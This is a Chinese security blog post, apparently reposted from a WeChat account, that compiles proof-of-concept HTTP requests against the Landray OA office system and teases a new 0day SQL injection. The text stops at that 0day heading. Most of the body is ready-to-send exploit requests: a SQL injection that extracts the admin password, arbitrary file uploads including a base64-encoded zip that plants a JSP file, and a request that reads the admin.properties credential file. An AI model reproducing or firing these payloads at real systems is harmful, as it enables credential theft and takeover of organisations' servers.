2025-12-22 04:36:42 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 这篇文章介绍了蓝凌OA系统的多个已知漏洞POC，包括SQL注入、任意文件上传和远程命令执行等，并声称发现了一个新的0daySQL注入漏洞。文章主要目的是推广作者的付费圈子，其中包含完整的0day详情和其他安全资源。 综合评分： 79 文章分类： 漏洞分析,漏洞POC,0day,WEB安全,代码审计

cover_image

【0day】蓝凌OA再爆SQL注入

原创

SharkSec

2025年12月14日 19:42 湖南

🔔 温馨提示：为了防止走散，不错过每一篇干货内容，请记得将公众号设置为星标！🌟

【声明】本文技术、思路及工具仅用于合法安全测试与防御研究，严禁用于非法入侵、攻击他人系统或盈利等违法违规行为，一切后果由操作者自行承担，作者及团队不承担任何连带责任。

引言

蓝凌OA是一款基于Java EE架构开发，该系统承载着业务数据与核心工作流程，模块复杂且支持高度定制，因此在攻防对抗中已成为攻击者重点攻击的目标之一。本文整理了多个相关漏洞的POC，并在文末附0day信息。

wechatLoginHelper SQL注入

POST&nbsp;/third/wechat/wechatLoginHelper.do HTTP/1.1User-Agent: Mozilla/5.0&nbsp;(Macintosh; Intel Mac OS X&nbsp;10_14_3) AppleWebKit/605.1.15&nbsp;(KHTML, like Gecko) Version/12.0.3&nbsp;Safari/605.1.15Accept-Encoding: gzip, deflateAccept: */*Connection: closeHost:&nbsp;Content-Type: application/x-www-form-urlencodedContent-Length:&nbsp;147
method=edit&uid=1'and+(SELECT+fdPassword%2B'----'+FROM+com.landray.kmss.sys.organization.model.SysOrgPerson+where+fdLoginName='admin')=1+and+'1'='1

任意文件上传

POST /eis/service/api.aspx?action=saveImg HTTP/1.1Host:&nbsp;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Content-Length: 197Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu------WebKitFormBoundaryxdgaqmquContent-Disposition: form-data; name="file"filename="icfitnya.txt"Content-Type: text/htmljmnqjfdsupxgfidopeixbgsxbf------WebKitFormBoundaryxdgaqmqu--

custom远程命令执行

POST&nbsp;/sys/ui/extend/varkind/custom.jsp HTTP/1.1Host:&nbsp;User-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0; WOW64) AppleWebKit/537.36&nbsp;(KHTML, like Gecko) Chrome/102.0.0.0&nbsp;Safari/537.36Accept: */*Referer: http://www.ynjd.cn:801//sys/ui/extend/varkind/custom.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=E53E077373AF06F1A07FB56C93CF835BConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length:&nbsp;42
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

sysUiExtend.do任意文件上传

POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Content-Type: multipart/form-data; boundary=---------------------------260140030128010173621878123124Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequest
-----------------------------260140030128010173621878123124Content-Disposition: form-data; name="file"; filename="guyue.zip"Content-Type: application/x-zip-compressed
{{base64dec(UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==)}}-----------------------------260140030128010173621878123124--

上述所涉漏洞均为已公开的历史漏洞POC整理，接下来给大家公布的0day则是通过本地搭建环境、审计代码并进行安全分析所得。

0day–SQL注入